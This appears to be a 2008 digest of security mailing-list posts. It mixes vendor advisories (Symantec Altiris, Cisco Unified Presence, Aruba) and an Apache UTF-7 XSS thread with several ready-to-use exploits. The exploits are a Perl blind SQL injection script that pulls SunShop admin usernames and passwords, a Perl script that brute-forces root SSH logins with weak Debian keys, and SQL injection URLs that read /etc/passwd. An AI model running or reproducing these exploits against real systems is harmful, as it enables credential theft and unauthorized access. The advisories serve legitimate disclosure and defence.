ZDI-08-025: Symantec Altiris Deployment Solution Domain Credential Disclosure Vulnerability
ZDI-08-025: Symantec Altiris Deployment Solution Domain Credential Disclosure Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-025 May 15, 2008 -- Affected Vendors: Symantec -- Affected Products: Symantec Altiris Deployment Solution -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 5936. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to remotely obtain domain credentials on vulnerable installations of Symantec Altiris Deployment Solution. User interaction is not required to exploit this vulnerability. Authentication is not required to exploit this vulnerability. The specific flaw exists within the axengine.exe service listening by default on TCP port 402. The service allows a remote client to request encrypted domain credentials without authentication. The encryption lacks a salt allowing an attacker with a local installation of Altiris Deployment Solution to easily decrypt the credentials. -- Vendor Response: Symantec has issued an update to correct this vulnerability. More details can be found at: http://www.symantec.com/avcenter/security/Content/2008.05.14a.html -- Disclosure Timeline: 2008-02-07 - Vulnerability reported to vendor 2008-05-15 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Brett Moore of Insomnia Security www.insomniasec.com -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]
ZDI-08-024: Symantec Altiris Deployment Solution SQL Injection Vulnerability
ZDI-08-024: Symantec Altiris Deployment Solution SQL Injection Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-024 May 15, 2008 -- Affected Vendors: Symantec -- Affected Products: Symantec Altiris Deployment Solution -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 5935. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Symantec Altiris Deployment Solution. User interaction is not required to exploit this vulnerability. The specific flaw exists within the axengine.exe process listening by default on TCP port 402. A lack of proper sanitation while parsing requests allows for a remote attacker to inject arbitrary SQL statements into the database. Exploitation of this vulnerability can result in arbitrary code execution under the context of the SYSTEM user. -- Vendor Response: Symantec has issued an update to correct this vulnerability. More details can be found at: http://www.symantec.com/avcenter/security/Content/2008.05.14a.html -- Disclosure Timeline: 2008-02-07 - Vulnerability reported to vendor 2008-05-15 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Brett Moore of Insomnia Security www.insomniasec.com -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]
SunShop Version 3.5.1 Remote Blind Sql Injection
#!/usr/bin/perl -w
use LWP::UserAgent;
# scripts : SunShop Version 3.5.1 Remote Blind Sql Injection
# scripts site : http://www.turnkeywebtools.com/sunshop/
# Discovered
# By : irvian
# site : http://irvian.cn
# email : [EMAIL PROTECTED]
print "\r\n[+]-[+]\r\n";
print "[+]Blind SQL injection [+]\r\n";
print "[+]SunShop Version 3.5.1 [+]\r\n";
print "[+]code by irvian [+]\r\n";
print "[+]special : ifx, arioo, jipank, bluespy [+]\r\n";
print "[+]-[+]\n\r";
if (@ARGV < 5){
die "
Cara Mengunakan : perl $0 host option id tabel itemid
Keterangan
host : http://victim.com
Option : pilih 1 untuk mencari username dan pilih 2 untuk mencari password
id : Isi Angka Kolom id biasanya 1, 2 ,3 dst
tabel : Isi Kolom tabel biasanya admin atau ss_admin
itemid : Isi Angka valid (ada productnya) di belakang index.php?action=item&id=
Contoh : perl $0 http://www.underhills.com/cart 1 1 admin 10
\n";}
$url = $ARGV[0];
$option = $ARGV[1];
$id = $ARGV[2];
$tabel = $ARGV[3];
$itemid = $ARGV[4];
if ($option eq 1){
syswrite(STDOUT, "username: ", 10);}
elsif ($option eq 2){
syswrite(STDOUT, "password: ", 10);}
for($i = 1; $i <= 32; $i++){
$f = 0;
$n = 32;
while(!$f && $n <= 57)
{
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
if ($f==0){
$n = 97;
while(!$f && $n <= 122)
{
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
}
}
print "\n[+]finish Execution Exploit\n";
sub blind {
my $site = $_[0];
my $op = $_[1];
my $id = $_[2];
my $tbl = $_[3];
my $i = $_[4];
my $n = $_[5];
my $item = $_[6];
if ($op eq 1){
$klm = "username";
}
elsif ($op eq 2){
$klm = "password";
}
my $ua = LWP::UserAgent->new;
my $url =
"$site"."/index.php?action=item&id="."$item"."'%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."$tbl"."%20WHERE%20id="."$id"."),"."$i".",1)=CHAR("."$n".")/*";
my $res = $ua->get($url);
my $browser = $res->content;
if ($browser !~ /This product is currently not viewable/i){
return 1;
}
else {
return 0;
}
}
RE: Cisco Security Advisory: Cisco Unified Presence Denial of Service Vulnerabilities (UNCLASSIFIED)
Classification: UNCLASSIFIED Caveats: NONE Please advise Theresa -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Cisco Systems Product Security Incident Response Team Sent: Wednesday, May 14, 2008 12:15 PM To: bugtraq@securityfocus.com Cc: [EMAIL PROTECTED] Subject: Cisco Security Advisory: Cisco Unified Presence Denial of Service Vulnerabilities -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco Unified Presence Denial of Service Vulnerabilities Advisory ID: cisco-sa-20080514-cup Revision 1.0 +- Summary === Cisco Unified Presence contains three denial of service (DoS) vulnerabilities that may cause an interruption in presence services. These vulnerabilities were discovered internally by Cisco, and there are no workarounds. Cisco has released free software updates that address these vulnerabilities. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml. Affected Products = Vulnerable Products +-- Cisco Unified Presence versions prior to 6.0(3) are affected by the vulnerabilities described in this advisory. Administrators of systems running all Cisco Unified Presence versions can determine the software version by viewing the main page of the Cisco Unified Presence Administration interface. The software version can be determined by running the command show version active via the Command Line Interface (CLI). Products Confirmed Not Vulnerable + No other Cisco products are currently known to be affected by these vulnerabilities. Details === Cisco Unified Presence collects information about a user's availability status and communications capabilities. Using information captured by Cisco Unified Presence, applications such as Cisco Unified Personal Communicator and Cisco Unified Communications Manager can improve productivity by helping users connect with colleagues more efficiently by determining the most effective means for collaborative communication. The Presence Engine service of Cisco Unified Presence version 1.0 contains two vulnerabilities that occur when a series of malformed IP packets are received by a vulnerable Cisco Unified Presence system and may result in a DoS condition. There are no workarounds for these vulnerabilities. These vulnerabilities are fixed in Cisco Unified Presence version 6.0(1). Cisco Unified Presence version 6.0(1) is the upgrade path for Cisco Unified Presence version 1.0. The first vulnerability is documented in CVE-2008-1158 and Cisco Bug ID CSCsh50164. The second vulnerability is documented in CVE-2008-1740 and Cisco Bug ID CSCsh20972. The SIP Proxy service of Cisco Unified Presence versions 6.0(1) and 6.0(2) contain a vulnerability that occurs when a TCP port scan is received by a vulnerable Cisco Unified Presence system and may result in a DoS condition. There is no workaround for this vulnerability. This vulnerability is fixed in Cisco Unified Presence version 6.0(3). This vulnerability is documented in CVE-2008-1741 and Cisco Bug ID CSCsj64533. Vulnerability Scoring Details = Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCsh50164 - PE Service core dumps when it receives malformed packets CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication -None Confidentiality Impact -None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability -Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsh20972 - PE Service core dumps under stress test CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication -None Confidentiality Impact -None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability -Functional Remedia
Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability
Setting the HTTP response header: Content-Type: text/html; charset=iso-8859-1 or adding the tag: or even both - still does not deter IE from scanning the contents and interpreting them as UTF-7 when Encoding=Auto-Select. (observed on w2k with IE 6.0.2800.1106 SP1 + Q867801 + Q823353 + Q833989 + Q903235) It appears there is little that web servers can do to thwart this, short of changing all '+' characters to %2B. That seems excessive. -tom-
Aruba Mobility Controller TACACS User Authentication and Cross Site Scripting Vulnerabilities (Aruba Advisory ID: AID-051408)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Aruba Networks Security Advisory Title: Aruba Mobility Controller TACACS User Authentication and Cross Site Scripting Vulnerabilities Aruba Advisory ID: AID-051408 Revision: 1.0 For Public Release on 05/14/2008 + 1.) TITLE: Mobility Controller TACACS User Authentication Vulnerability SUMMARY A user authentication vulnerability was discovered during standard bug reporting procedures in the Aruba Mobility Controller. This vulnerability only affects customers using TACACS authentication for Controller management users. AFFECTED ArubaOS VERSIONS ~ 3.1.1.x, 3.2.0.x, 3.3.1.x and 3.1.1FIPS DETAILS Aruba Mobility Controllers may use external authentication methods to authenticate users. A vulnerability in the TACACS authentication component may allow unauthorized web UI/ssh/telnet access to the Aruba Mobility Controller. TACACS is not the default authentication method and must be configured as an authentication method for users before it will be used. By default, user accounts and passwords are kept in a local database which is not vulnerable to this issue. Other authentication methods supported by the Aruba Mobility Controller are not vulnerable to this issue. IMPACT An attacker with web UI/ssh/telnet access to the Aruba Mobility Controller may be able to gain unauthorized access to the administration account of an Aruba Mobility Controller. CVSS BASE METRIC SCORE: 10 WORKAROUNDS Aruba Networks recommends that all customers apply the appropriate patch(es) as soon as practical. However, in the event that a patch cannot immediately be applied, the following steps will help to mitigate the risk: - - Disable TACACS authentication for all accounts until such time as the patches can be applied. - - Do not expose the Mobility Controller administrative interface to untrusted networks such as the Internet. SOLUTION Aruba Networks recommends that all customers apply the appropriate patch(es) as soon as practical. However, in the event that a patch cannot immediately be applied, the workaround steps will help to mitigate the risk. + 2.) TITLE: Mobility Controller Web UI Cross Site Scripting Vulnerabilities SUMMARY Cross-site scripting vulnerabilities were discovered during standard bug reporting procedures in the Aruba Mobility Controller. Certain malformed inputs to the web UI allow the injection of cross-site scripting (XSS) components, leading to a potential compromise of client web session integrity. AFFECTED ArubaOS VERSIONS ~ 2.5.5.x, 2.5.6.x, 2.4.8.x-FIPS, 3.1.1.x, 3.1.1.x-FIPS, 3.2.0.x, 3.3.1.x DETAILS Aruba Mobility Controllers may present a web-based management and captive portal interface. Providing malformed input to the web UI may result in the presentation of that input to the user. Malicious XSS injection via the web UI may not require action to be taken by the victim. IMPACT An attacker with web UI access to the Aruba Mobility Controller may be able to compromise the integrity of a client web session or subvert the authentication exchange content to retrieve administrator authentication credentials to the Aruba Mobility Controller. CVSS BASE METRIC SCORE: 10 WORKAROUNDS Aruba Networks recommends that all customers apply the appropriate patch(es) as soon as practical. However, in the event that a patch cannot immediately be applied, the following steps will help to mitigate the risk: - - Do not expose the Mobility Controller administrative interface to untrusted networks such as the Internet. SOLUTION Aruba Networks recommends that all customers apply the appropriate patch(es) as soon as practical. However, in the event that a patch cannot immediately be applied, the workaround steps will help to mitigate the risk. + OBTAINING FIXED FIRMWARES Aruba customers can obtain the firmware on the support website: http://www.arubanetworks.com/support. Aruba Support contacts are as follows: 1-800-WiFiLAN (1-800-943-4526) (toll free from within North America) +1-408-754-1200 (toll call from anywhere in the world) e-mail: support(at)arubanetworks.com Please, do not contact either "wsirt(at)arubanetworks.com" or "security(at)arubanetworks.com" for software upgrades. EXPLOITATION AND PUBLIC ANNOUNCEMENTS This vulnerability will be announced at Aruba W.S.I.R.T. Advisory: http://www.arubanetworks.com/support/alerts/aid-051408.asc SecurityFocus Bugtraq http://www.securityfocus.com/archive/1 STATUS OF THIS NOTICE: Final Although Aruba Networks cannot guarantee the accuracy of all statements in this advisory, all of the facts have been checked to the best of our ability. Aruba Networks does not anticipate issuing updated versions of this advisory unless there is some material change in the facts. Should there be a
Debian generated SSH-Keys working exploit
Hi Securityfocus,
the debian openssl issue leads that there are only 65.536 possible ssh keys
generated, cause the only entropy is the pid of the process generating the key.
This leads to that the following perl script can be used with the precalculated
ssh keys to brute force the ssh login. It works if such a keys is installed on
a non-patched debian or any other system manual configured to.
On an unpatched system, which doesn't need to be debian, do the following:
1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
2. Extract it to a directory
3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 Bits,
generated on an upatched debian (this is the key this exploit will break)
4. Run the perl script and give it the location to where you extracted the
bzip2 mentioned.
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
print "By [EMAIL PROTECTED]";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ }
@a)." ".$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes (less than 20 minutes)
Regards,
Markus Mueller
[EMAIL PROTECTED]
Kostenloses Linkmanagementscript SQL Injection Vulnerabilities
### # # # ...Kostenloses Linkmanagementscript SQL Injection Vulnerabilities ... # ### Virangar Security Team www.virangar.net Discoverd By :virangar security team(hadihadi) special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) - ---vuln codes in:--- top_view.php: line 3:$id = $_GET['id']; .. .. ine 19:$voting_page_command_sql = "SELECT votings, worth FROM ".$tab_links." WHERE id = '".$id."'"; * view.php: line 8:$id = $_GET['id']; line 9:$view_page_command_sql = "SELECT url, hits FROM ".$tab_links." WHERE id = '".$id."'"; --- exploits: http://site.com/[patch]/view.php?id='/**/union/**/select/**/now(),load_file(0x2f6574632f706173737764)/**/from/**/mysql.user/* http://site.com/[patch]/top_view.php?id='/**/union/**/select/**/now(),load_file(0x2f6574632f706173737764)/**/from/**/mysql.user/* ---
Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability
Hello, Please try to understand what we did here. You might be right in here: "As all ISO, UTF-8 and related charsets were 7-bit clean, it's clear that Microsoft err'ed on the side of accepting UTF-7 charset for automatic detection in violation of RFC 2616." But as I said in the 1st mail that I sent: "We leave it to other hackers to upgrade the attack and make it fully automatic." I mean that the FireFox will not show the XSS unless you change the encoding. If it was "fully automatic" it could change the FireFox encoding, but it's not it's only a PoC. Try to change FireFox to auto-select and refresh it so it will jump to UTF-7. Yaniv Miron aka "Lament". __ __ Gentlemen, With respect to http://www.securityfocus.com/bid/29112 Per http://www.ietf.org/rfc/rfc2616.txt 3.7.1 Canonicalization and Text Defaults [...] The "charset" parameter is used with some media types to define the character set (section 3.4) of the data. When no explicit charset parameter is provided by the sender, media subtypes of the "text" type are defined to have a default charset value of "ISO-8859-1" when received via HTTP. Data in character sets other than "ISO-8859-1" or its subsets MUST be labeled with an appropriate charset value. See section 3.4.1 for compatibility problems. Internet Explorer's autodetection of UTF-7 clearly violates this specification, introducing the opportunity for myriad similar attacks. There are several workarounds in Apache HTTP Server to prevent Microsoft's vulnerability, including AddDefaultCharset ISO-8859-1 or by enabling multilanguage error docs (with explicit charsets) by simply uncommenting this Include directive of the default httpd.conf file; # Multi-language error messages Include conf/extra/httpd-multilang -errordoc.conf All releases after Jan 2 include a global fix that adds an explicit charset iso-8859-1 to compensate for Microsoft's vulnerability, including 2.2.8, 2.0.63, and 1.3.41. However this vulnerability should clearly be labeled as a flaw in Internet Explorer. As all ISO, UTF-8 and related charsets were 7-bit clean, it's clear that Microsoft err'ed on the side of accepting UTF-7 charset for automatic detection in violation of RFC 2616. We are be pleased to offer SecurityFocus the opportunity correct this misinformation before we raise issue on the public discussion forums. Bill Apache HTTP Server
